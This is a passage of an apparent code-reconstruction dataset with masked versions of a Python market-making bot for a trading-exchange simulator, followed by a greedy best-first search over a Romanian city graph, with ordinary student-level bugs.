server_msg['size']\n direction = server_msg['dir']\n global positions\n if symbol == 'BOND':\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n add('BOND', 'SELL', 1001, size)\n elif direction == 'SELL':\n pending_sell_orders[symbol] -= size\n add('BOND', 'BUY', 999, size)\n if symbol == 'VALE':\n print('Vale Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['VALE'] += size\n elif direction == 'SELL':\n positions['VALE'] -= size\n pending_sell_orders[symbol] -= size\n if symbol == 'XLF':\n print('XLF Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['XLF'] += size\n elif direction == 'SELL':\n positions['XLF'] -= size\n pending_sell_orders[symbol] -= size\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\ndef cancel(order_id):\n write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})\n\n\ndef listen_for_fills(server_msg):\n if server_msg['type'] == 'fill':\n order_num = server_msg['order_id']\n symbol = server_msg['symbol']\n size = server_msg['size']\n direction = server_msg['dir']\n global positions\n if symbol == 'BOND':\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n add('BOND', 'SELL', 1001, size)\n elif direction == 'SELL':\n pending_sell_orders[symbol] -= size\n add('BOND', 'BUY', 999, size)\n if symbol == 'VALE':\n print('Vale Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['VALE'] += size\n elif direction == 'SELL':\n positions['VALE'] -= size\n pending_sell_orders[symbol] -= size\n if symbol == 'XLF':\n print('XLF Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['XLF'] += size\n elif direction == 'SELL':\n positions['XLF'] -= size\n pending_sell_orders[symbol] -= size\n\n\ndef listen_for_book(server_msg):\n if server_msg['type'] == 'book':\n global vale_sell\n global vale_buy\n global xlf_sell\n global xlf_buy\n if server_msg['symbol'] == 'VALE':\n if len(server_msg['sell']) > 0:\n vale_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n vale_buy = server_msg['buy'][0][0]\n if server_msg['symbol'] == 'XLF':\n if len(server_msg['sell']) > 0:\n xlf_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n xlf_buy = server_msg['buy'][0][0]\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n 
time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\ndef cancel(order_id):\n write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})\n\n\ndef listen_for_fills(server_msg):\n if server_msg['type'] == 'fill':\n order_num = server_msg['order_id']\n symbol = server_msg['symbol']\n size = server_msg['size']\n direction = server_msg['dir']\n global positions\n if symbol == 'BOND':\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n add('BOND', 'SELL', 1001, size)\n elif direction == 'SELL':\n pending_sell_orders[symbol] -= size\n add('BOND', 'BUY', 999, size)\n if symbol == 'VALE':\n print('Vale Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['VALE'] += size\n elif direction == 'SELL':\n positions['VALE'] -= size\n pending_sell_orders[symbol] -= size\n if symbol == 'XLF':\n print('XLF Order Filled: ' + str(order_num) + ' ' + direction +\n ' Size: ' + str(size))\n if direction == 'BUY':\n pending_buy_orders[symbol] -= size\n positions['XLF'] += size\n elif direction == 'SELL':\n positions['XLF'] -= size\n pending_sell_orders[symbol] -= size\n\n\ndef listen_for_book(server_msg):\n if server_msg['type'] == 'book':\n global vale_sell\n global vale_buy\n global xlf_sell\n global xlf_buy\n if server_msg['symbol'] == 'VALE':\n if len(server_msg['sell']) > 0:\n vale_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n vale_buy = server_msg['buy'][0][0]\n if server_msg['symbol'] == 'XLF':\n if len(server_msg['sell']) > 0:\n xlf_sell = server_msg['sell'][0][0]\n if len(server_msg['buy']) > 0:\n xlf_buy = server_msg['buy'][0][0]\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n 
time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\ndef listen_for_errors(server_msg):\n if server_msg['type'] == 'reject':\n print('ERROR: ORDER FAILED, id: ' + str(server_msg['order_id']) +\n ' ' + server_msg['error'])\n if server_msg['type'] == 'error':\n print('ERROR: ORDER FAILED, id: ' + str(id) + ' ' + server_msg['error']\n )\n if server_msg['type'] == 'ack':\n print('Order Completed: ' + str(server_msg['order_id']))\n if server_msg['type'] == 'out':\n print('Order Successfully Canceled: ' + str(server_msg['order_id']))\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/python\n\n# ~~~~~============== HOW TO RUN ==============~~~~~\n# 1) Configure things in CONFIGURATION section\n# 2) Change permissions: chmod +x bot.py\n# 3) Run in loop: while true; do ./bot.py; sleep 1; done\n\nfrom __future__ import print_function\n\nimport sys\nimport socket\nimport json\nimport time\n\n# ~~~~~============== CONFIGURATION ==============~~~~~\n# replace REPLACEME with your team name!\nteam_name=\"BULBASAUR\"\n# This variable dictates whether or not the bot is connecting to the prod\n# or test exchange. Be careful with this switch!\ntest_mode = True\n\n# This setting changes which test exchange is connected to.\n# 0 is prod-like\n# 1 is slower\n# 2 is empty\ntest_exchange_index=0\nprod_exchange_hostname=\"production\"\n\nport=25000 + (test_exchange_index if test_mode else 0)\nexchange_hostname = \"test-exch-\" + team_name if test_mode else prod_exchange_hostname\n\n# ~~~~~============== NETWORKING CODE ==============~~~~~\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write(\"\\n\")\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n# ~~~~~============== MAIN LOOP ==============~~~~~\nexchange = None\norders_placed = 0\npending_orders = []\npending_buy_orders = {\"BOND\": 0, \"VALBZ\": 0, \"VALE\": 0, \"XLF\": 0}\npending_sell_orders = {\"BOND\": 0, \"VALBZ\": 0, \"VALE\": 0, \"XLF\": 0}\npositions = {\"BOND\": 0, \"VALBZ\": 0, \"VALE\": 0, \"XLF\": 0}\nvale_buy_pending_id = None\nvale_sell_pending_id = None\nvale_sell = 0\nvale_buy = 0\n\nxlf_buy_pending_id = None\nxlf_sell_pending_id = None\nxlf_sell = 0\nxlf_buy = 0\n\ndef main():\n global exchange\n exchange = connect()\n hello()\n hello_from_exchange = read_from_exchange(exchange)\n # A common mistake people make is to call write_to_exchange() > 1\n # time for every read_from_exchange() response.\n # Since many write messages generate marketdata, this will cause an\n # exponential explosion in pending messages. 
Please, don't do that!\n print(\"The exchange replied:\", hello_from_exchange, file=sys.stderr)\n global positions\n positions[\"BOND\"] = hello_from_exchange[\"symbols\"][0][\"position\"]\n positions[\"VALE\"] = hello_from_exchange[\"symbols\"][5][\"position\"]\n positions[\"VALBZ\"] = hello_from_exchange[\"symbols\"][4][\"position\"]\n positions[\"XLF\"] = hello_from_exchange[\"symbols\"][7][\"position\"]\n\n add(\"BOND\", \"BUY\", 999, 100 - positions[\"BOND\"])\n add(\"BOND\", \"SELL\", 1001, 100 + positions[\"BOND\"])\n\n while (True):\n server_msg = read_from_exchange(exchange)\n buy_sell_vale()\n buy_sell_xlf()\n listen_for_fills(server_msg)\n listen_for_book(server_msg)\n listen_for_errors(server_msg)\n \ndef hello():\n write_to_exchange(exchange, {\"type\": \"hello\", \"team\": team_name.upper()})\n\ndef add(symbol, direction, price, size):\n # Update order id to be order placed number\n global orders_placed\n orders_placed += 1\n # Add to pending orders list\n global pending_orders\n pending_orders.append(orders_placed)\n #if symbol == \"VALE\":\n print(\"Order Placed: \" + str(orders_placed) + \" Position: \" + str(positions[symbol])+ \" Size: \" + str(size) + \" Dir: \" + direction + \" Symbol: \" + symbol + \" Price: \" + str(price) + \"\")\n\n # Increment Buy Orders If Necessary\n if (direction == \"BUY\"):\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif (direction == \"SELL\"):\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n # Add order to exchange\n write_to_exchange(exchange, {\"type\": \"add\", \"order_id\": orders_placed, \"symbol\": symbol,\n \"dir\":direction, \"price\":price, \"size\": size })\n # \n read_from_exchange(exchange)\n\ndef cancel(order_id):\n write_to_exchange(exchange, {\"type\": \"cancel\", \"order_id\": order_id}) \n\ndef listen_for_fills(server_msg):\n if (server_msg[\"type\"] == \"fill\"):\n # Get info of filled order\n order_num = server_msg[\"order_id\"]\n symbol = server_msg[\"symbol\"]\n size = server_msg[\"size\"]\n direction = server_msg[\"dir\"]\n global positions\n # Update bond order fill and buy/sell as necessary\n if (symbol == \"BOND\"):\n # print(\"Bond Order Partially Filled: \" + str(order_num))\n if (direction == \"BUY\"):\n pending_buy_orders[symbol] -= size\n add(\"BOND\", \"SELL\", 1001, size)\n elif (direction == \"SELL\"):\n pending_sell_orders[symbol] -= size\n add(\"BOND\", \"BUY\", 999, size)\n # Update Vale Order fill and hedge as necessary\n if (symbol == \"VALE\"):\n print(\"Vale Order Filled: \" + str(order_num) + \" \" + direction + \" Size: \" + str(size))\n if (direction == \"BUY\"):\n pending_buy_orders[symbol] -= size\n positions[\"VALE\"] += size\n elif (direction == \"SELL\"):\n positions[\"VALE\"] -= size\n pending_sell_orders[symbol] -= size\n if (symbol == \"XLF\"):\n print(\"XLF Order Filled: \" + str(order_num) + \" \" + direction + \" Size: \" + str(size))\n if (direction == \"BUY\"):\n pending_buy_orders[symbol] -= size\n positions[\"XLF\"] += size\n elif (direction == \"SELL\"):\n positions[\"XLF\"] -= size\n pending_sell_orders[symbol] -= size\n\ndef listen_for_book(server_msg):\n if (server_msg[\"type\"] == \"book\"):\n global vale_sell\n global vale_buy\n global xlf_sell\n global xlf_buy\n if (server_msg[\"symbol\"] == \"VALE\"):\n if len(server_msg[\"sell\"]) > 0:\n vale_sell = server_msg[\"sell\"][0][0]\n if len(server_msg[\"buy\"]) > 0:\n vale_buy = server_msg[\"buy\"][0][0]\n if (server_msg[\"symbol\"] == \"XLF\"):\n if len(server_msg[\"sell\"]) > 0:\n 
xlf_sell = server_msg[\"sell\"][0][0]\n if len(server_msg[\"buy\"]) > 0:\n xlf_buy = server_msg[\"buy\"][0][0]\n\ndef buy_sell_vale():\n if vale_buy > 0 and vale_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if ( pending_buy_orders[\"VALE\"] + positions[\"VALE\"] < 10):\n global vale_buy_pending_id\n if vale_buy_pending_id:\n cancel(vale_buy_pending_id)\n pending_buy_orders[\"VALE\"] = 0\n vale_buy_pending_id = None\n print(\"Cancel VALE BUY Order: \" + str(orders_placed))\n time.sleep(1)\n num_stock = 10 - positions[\"VALE\"]\n add(\"VALE\", \"BUY\", vale_buy + 1, 10 - positions[\"VALE\"])\n\n vale_buy_pending_id = orders_placed\n elif (positions[\"VALE\"] - pending_sell_orders[\"VALE\"] > -10):\n global vale_sell_pending_id\n if vale_sell_pending_id:\n print(\"Cancel VALE Sell Order: \" + str(orders_placed))\n cancel(vale_sell_pending_id)\n pending_sell_orders[\"VALE\"] = 0\n vale_sell_pending_id = None\n time.sleep(1)\n num_stock = 10 - positions[\"VALE\"]\n add(\"VALE\", \"SELL\", vale_sell - 1, num_stock)\n vale_sell_pending_id = orders_placed\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if ( pending_buy_orders[\"XLF\"] + positions[\"XLF\"] < 100):\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders[\"XLF\"] = 0\n xlf_buy_pending_id = None\n print(\"Cancel XLF Order: \" + str(orders_placed))\n time.sleep(1)\n add(\"XLF\", \"BUY\", xlf_buy + 1, 100 - positions[\"XLF\"])\n xlf_buy_pending_id = orders_placed\n elif (positions[\"XLF\"] - pending_sell_orders[\"XLF\"] > -100):\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print(\"Cancel XLF Order: \" + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders[\"XLF\"] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add(\"XLF\", \"SELL\", xlf_sell - 1, 100 + positions[\"XLF\"])\n xlf_sell_pending_id = orders_placed\n\ndef listen_for_errors(server_msg):\n if (server_msg[\"type\"] == \"reject\"):\n print(\"ERROR: ORDER FAILED, id: \" + str(server_msg[\"order_id\"]) + \" \" + server_msg[\"error\"])\n if (server_msg[\"type\"] == \"error\"):\n print(\"ERROR: ORDER FAILED, id: \" + str(id) + \" \" + server_msg[\"error\"])\n if (server_msg[\"type\"] == \"ack\"):\n print(\"Order Completed: \" + str(server_msg[\"order_id\"]))\n if (server_msg[\"type\"] == \"out\"):\n print(\"Order Successfully Canceled: \" + str(server_msg[\"order_id\"]))\n\n #add(\"BOND\", \"BUY\", 999, 100 - positions[\"BOND\"])\n #add(\"BOND\", \"SELL\", 1001, 100 + positions[\"BOND\"])\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
5,
8,
9,
10,
16
]
}
|
[
5,
8,
9,
10,
16
] |
<|reserved_special_token_0|>
class OrderVector:
<|reserved_special_token_0|>
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
<|reserved_special_token_1|>
import numpy as np
from StudyCaseUdemy.Graph import Graph
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos + 1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos + 1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i]
.distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
<|reserved_special_token_1|>
import numpy as np
from StudyCaseUdemy.Graph import Graph
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos+1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos+1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
# vector = OrderVector(5)
# vector.insert(grafo.arad)
# vector.insert(grafo.craiova)
# vector.insert(grafo.bucharest)
# vector.insert(grafo.dobreta)
# vector.insert(grafo.lugoj)
# vector.printer()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
|
flexible
|
{
"blob_id": "87291d066b94aca1d94cbe5d9281fc72da1b0c35",
"index": 9483,
"step-1": "<mask token>\n\n\nclass OrderVector:\n <mask token>\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-4": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
